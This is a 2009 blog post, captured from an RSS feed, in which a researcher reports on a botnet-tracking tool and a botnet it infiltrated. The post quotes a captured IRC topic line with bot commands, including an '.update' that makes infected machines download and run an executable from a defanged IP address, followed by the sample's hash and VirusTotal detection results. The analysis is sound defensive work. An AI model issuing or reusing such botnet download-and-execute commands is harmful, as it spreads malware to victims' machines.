onHacks » Botnet http://onhacks.org On Hacking Across Boundaries Wed, 02 Jun 2010 05:48:30 +0000 en hourly 1 http://wordpress.org/?v=3.0 Botnet Update In Action http://onhacks.org/lang/en/2009/08/23/botnet-update-in-action http://onhacks.org/lang/en/2009/08/23/botnet-update-in-action#comments Sun, 23 Aug 2009 15:00:00 +0000 log0 http://onhacks.org/?p=600 I am currently developing a tool to automate tracking botnets. Input is a folder of binaries, and output is endless bot logs (commands, conversations, how they work), plus (possibly unseen. undetected) malware binaries and hopefully automated analysis too. =)

Here is something my tool caught while I was testing on a botnet. I used one of the malware binaries caught by my honeypot to infiltrate the botnet =) They are paying off!

2009-08-23 18:27:20,644 – log-6 – INFO – Received : [:irc.efnet.com 332 [ #xx6 :.flushdns |.down -S |.update -S |.update http://94[dot]76[dot]194[dot]116/xx8.exe x5s5g6q3x1n3.exe x5s5g6q3x1n3]

There is some Deutsch (German) stuffs… not necessarily their stuffs though. Disconnected me.

ERROR :Closing Link: [[<my ip, removed!!!>] (Client hat die Verbindung getrennt)

The binary is very new, just 4 hours ago at 2009-08-23 18:27:20,644 ( GMT +8 ).

The binary at http://94[dot]76[dot]194[dot]116/xx8.exe (MD5sum : 7904937c07c031e81023dbd81ac93b64) has VirusTotal results :

File winhost.exe received on 2009.08.22 15:54:06 (UTC)
Current status: finished

Result: 6/41 (14.63%)

Antivirus Version Last Update Result
a-squared 4.5.0.24 2009.08.22 -
AhnLab-V3 5.0.0.2 2009.08.21 -
AntiVir 7.9.1.3 2009.08.21 -
Antiy-AVL 2.0.3.7 2009.08.21 -
Authentium 5.1.2.4 2009.08.22 -
Avast 4.8.1335.0 2009.08.21 -
AVG 8.5.0.406 2009.08.22 Worm/Generic.AHOV
BitDefender 7.2 2009.08.22 -
CAT-QuickHeal 10.00 2009.08.22 -
ClamAV 0.94.1 2009.08.22 -
Comodo 2058 2009.08.22 -
DrWeb 5.0.0.12182 2009.08.22 BackDoor.IRC.Bot.127
eSafe 7.0.17.0 2009.08.20 -
eTrust-Vet 31.6.6694 2009.08.21 -
F-Prot 4.4.4.56 2009.08.22 -
F-Secure 8.0.14470.0 2009.08.21 -
Fortinet 3.120.0.0 2009.08.22 PossibleThreat
GData 19 2009.08.22 -
Ikarus T3.1.1.68.0 2009.08.22 -
Jiangmin 11.0.800 2009.08.21 -
K7AntiVirus 7.10.825 2009.08.22 -
Kaspersky 7.0.0.125 2009.08.22 Net-Worm.Win32.Kolab.dpo
McAfee 5716 2009.08.21 -
McAfee+Artemis 5716 2009.08.21 Artemis!7904937C07C0
McAfee-GW-Edition 6.8.5 2009.08.22 -
Microsoft 1.4903 2009.08.22 -
NOD32 4358 2009.08.22 -
Norman 6.01.09 2009.08.21 -
nProtect 2009.1.8.0 2009.08.22 -
Panda 10.0.0.14 2009.08.22 -
PCTools 4.4.2.0 2009.08.22 -
Prevx 3.0 2009.08.22 Low Risk Adware
Rising 21.43.50.00 2009.08.22 -
Sophos 4.44.0 2009.08.22 -
Sunbelt 3.2.1858.2 2009.08.22 -
Symantec 1.4.4.12 2009.08.22 -
TheHacker 6.3.4.3.385 2009.08.22 -
TrendMicro 8.950.0.1094 2009.08.22 -
VBA32 3.12.10.9 2009.08.22 -
ViRobot 2009.8.22.1897 2009.08.22 -
VirusBuster 4.6.5.0 2009.08.21 -

Detection rate 14.63%! Only 6/41 scanners detected it. Except Kaspersky, AVG, and DrWeb, the other 3 seems to give uncertain generic results.

Which scanner are you using?

我在寫一個自動化工具去追蹤殭屍網絡。只要一堆 EXE,就自動產生一堆殭屍網絡的實況(指令、對話、如何運作)、(有可能是未被發現及不能檢測到的)惡意檔及(希望未來能有的)自動化分析。

這是我的工具在測試時從殭屍網絡抓到的東東:

]]> http://onhacks.org/lang/en/2009/08/23/botnet-update-in-action/feed 1